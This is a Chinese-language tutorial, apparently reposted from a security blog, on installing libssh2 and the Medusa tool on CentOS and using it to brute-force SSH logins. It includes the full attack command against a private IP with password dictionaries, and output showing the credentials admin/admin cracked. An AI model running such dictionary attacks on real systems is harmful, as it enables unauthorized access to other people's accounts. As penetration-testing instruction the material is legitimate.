邮箱:service@hongdaqianqiu.com
1. 软件
OS::CentOS release 5.2 (Final) (可通过cat /etc/issue查看)
库:libssh2-1.2.7.tar.gz
medusa:medusa-2.0.tar.gz
2. 安装libssh2-1.2.7
将libssh2-1.2.7.tar.gz拷贝到/tmp/目录下,解压为libssh2-1.2.7并进入该目录:
2.1 ./configure
2.2 make
2.3 make install
3. 安装medusa-2.0
将medusa-2.0.tar.gz拷贝到/tmp/目录下,解压为medusa-2.0并进入该目录:
2.1 ./configure –build=”i686-pc-linux” –enable-moduel-ssh=yes
2.2 make
2.3 make install
4. 设置环境变量LD_LIBRARY_PATH便于用medusa破解SSH时找到相应的相应的共享库
export LD_LIBRARY_PATH=/usr/local/lib
NOTE:若在运行时出现如下类似错误时,一般用上述方法可解决
IMPORTANT: Couldn’t load “ssh” [libssh2.so.1: cannot open shared object file: No such file or directory].
5. 开始破解SSH
将字典(如brute.dic, p.dic)拷贝到目录/tmp/后,进入/tmp/目录,键入medusa可以看到其它帮助信息,根据帮助信息可以开始破解SSH.。e.g., (假设我们要破解的目标IP为192.168.10.126)
[root@CentOS2 tmp]# medusa -h 192.168.10.126 -U brute.dic -P p.dic -t 7 -f -r 10 -M ssh
Medusa v2.0 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networksjmk@foofus.net
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: adidas (123 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 0 complete) Password: admin (124 of 4086 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: access (125 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: accident (126 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: across (127 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: adam (128 of 4086 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 1 complete) Password: admin (129 of 4086 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.10.126 User: admin Password: admin [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.10.126 (1 of 1, 0 complete) User: admin (1 of 1, 2 complete) Password: Admin (130 of 4086 complete)
当发现有”ACCOUNT FOUND”时,说明成功破解,在上述例子中我们的成功破解的用户名为admin,密码为admin.
本文摘自独自等待博客由网络安全攻防研究室(www.91ri.org) 信息安全小组收集整理.
Copyright © hongdaChiaki. All Rights Reserved. 鸿大千秋 版权所有
联系方式:
地址: 深圳市南山区招商街道沿山社区沿山路43号创业壹号大楼A栋107室
邮箱:service@hongdaqianqiu.com
备案号:粤ICP备15078875号
